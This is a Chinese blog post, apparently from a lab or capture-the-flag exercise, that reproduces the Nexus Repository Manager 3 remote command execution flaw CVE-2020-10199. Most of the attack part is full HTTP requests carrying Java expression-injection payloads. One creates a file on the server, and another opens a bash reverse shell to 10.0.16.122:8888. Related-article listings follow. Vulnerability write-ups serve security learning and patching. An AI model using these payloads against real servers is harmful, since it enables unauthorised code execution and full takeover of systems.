Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

最新推荐文章于 2024-05-23 18:48:31 发布
最新推荐文章于 2024-05-23 18:48:31 发布
阅读量1.5k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch258563/article/details/131064058
版权

漏洞名称

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)
漏洞简述

​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 此漏洞的利用需要攻击者具备任意类型的账号权限。
影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

漏洞复现

第一步:启动环境,可看到Web页面

 

该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码admin:admin登录后台

获取当前Cookie和CSRF Token:

第二步:brup抓包且构造如下数据包

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{6*6*6}"]

}

}

 把执行6*6*6修改为创建一个Nexus文件

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/Nexus')}"]

}

}

 第三步:监听指定端口,执行反弹shell

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{

    "name": "internal",

    "online": true,

    "storage": {

        "blobStoreName": "default",

        "strictContentTypeValidation": true

    },

    "group": {

    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/10.0.16.122/8888<&1')}"]

}

}

 第四步:查看flag

 

土豆儿258563
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 1041
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
CVE-2019-5475】Sonatype Nexus Repository Manager操作系统命令注入漏洞复现
Blog of Jaoing
04-21 1161
Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 Sonatype NXRM中存在操作系统命令注入漏洞。攻击者可利用该漏洞执行代码......
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1134
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
Nexus 3越权漏洞(CVE-2020-11444)
m0_65150886的博客
02-18 664
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本中,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序中查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956)
m0_46699477的博客
05-23 344
【代码】Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956)
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1117
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1645
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
CVE-2019-7238:CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3未经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
这篇文章主要讨论了CVE-2020-29436,这是一个针对Nexus Repository Manager 3的安全漏洞,该漏洞是由于XML外部实体注入(XXE)引起的。Nexus Repository Manager 3是一款广泛使用的软件包仓库管理服务,它允许组织...
anti-csrf:功能齐全的反CSRF库
04-29
反CSRF库 动机 没有好的会话驱动的CSRF预防库。 好的,我们的意思是: 可以将CSRF令牌限制为以下任意一项或全部: 一个特定的会议 特定的HTTP URI 特定的IP地址(可选) 可以存储多个CSRF令牌 CSRF令牌在使用一次后失效 会话数据中存储的令牌数量上限在我们的实现中,最早的被删除 警告-请勿在所有$_SESSION数据都存储在客户端的cookie中的任何项目中使用。 这将快速运行HTTP cookie的最大4KB存储空间。 在任何项目中使用 请参阅autoload.php以获取SPL自动加载器。 与Twig模板一起使用 首先,添加一个像这样的过滤器: use \ ParagonIE \ AntiCSRF \ AntiCSRF ; $ twigEnv -> addFunction ( new \ Twig_SimpleFunction (
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行中!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
Sonatype Nexus Repository Manager 使用 nexus-cli 执行指令
最新发布
07-12
Sonatype Nexus Repository Manager 使用 nexus-cli 执行指令
Nexus Repository Manager OSS 2.14.21
02-22
Nexus Repository OSS is distributed with Sencha Ext ...Nexus Repository Manager 2 OSS is a repository manager which can be freely used and is distributed under the Eclipse Public License (EPL Version 1).
nexus3.x官方手册Documention-Repository Manager 3.pdf
12-11
nexus官方版关于3.x版本的documention,pdf版本,带目录,很好用。虽然是英文,但用于api的开发和理解还是够用。
Nexus搭建企业私有库
jexxx的博客
01-15 740
做私有库的工具有很多,如上一篇介绍的轻量级的npm包管理工具verdaccio。但刚好maven私服用的是nexus,所以最后选择了nexus来做npm的私服,和maven一套便于维护。----------------nexus安装过程省略----------------
漏洞情报 | Sonatype Nexus Repository Manager 目录遍历漏洞
爱国小白帽
06-24 1260
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Sonatype Nexus Repository Manager 是美国Sonatype公司的一款仓库管理器。 360漏洞云监测到 Sonatype Nexus Repository Manager 3.x 系列 3.31.0 之前的版本存在目录遍历漏洞CVE-2021-34553)。经认证的远程攻击者可在未被授予访问权限的情况下获取blob文件清单,并通过构造一个GET请求读取blob文件内容,造成信息泄露。 0x02 危害等级 中
注入补丁_【更新】Sonatype Nexus Repository Manager外部实体注入漏洞CVE202029436)
weixin_30119911的博客
01-13 757
漏洞名称 :Sonatype Nexus Repository Manager外部实体注入漏洞CVE-2020-29436威胁等级 : 高危影响范围:Nexus Repository Manager 3<=3.28.1漏洞类型 : XML外部实体注入利用难度 : 简单 漏洞分析 1Nexus Repository Manger介绍Nexus 一个是Mave...
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
要在 Sonatype Nexus Repository Manager执行 Docker pull,您需要先创建一个 Docker 代理存储库来缓存 Docker 镜像。以下是执行 Docker pull 的步骤: 1. 登录 Sonatype Nexus Repository Manager 并导航到 "Repositories" 页面。 2. 点击 "Create Repository" 按钮并选择 "docker (proxy)" 选项。 3. 输入仓库的相关信息,包括名称、URL 和可选的认证信息。 4. 点击 "Create Repository" 按钮以创建 Docker 代理存储库。 5. 转到 Docker 主机上,并确保已安装 Docker 客户端。 6. 在命令行中输入 "docker login" 命令,并输入您的 Sonatype Nexus Repository Manager 凭据以登录。 7. 使用以下命令拉取 Docker 镜像: ``` docker pull <nexus-url>/<repository-name>/<image-name>:<tag> ``` 其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。 例如,以下命令将从名为 "docker-proxy" 的 Docker 代理存储库中拉取 "nginx" 镜像的 "latest" 标签: ``` docker pull http://<nexus-url>/repository/docker-proxy/nginx:latest ``` 请注意,如果您的 Sonatype Nexus Repository Manager 受到防火墙或代理的限制,则可能需要配置 Docker 客户端以使用代理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值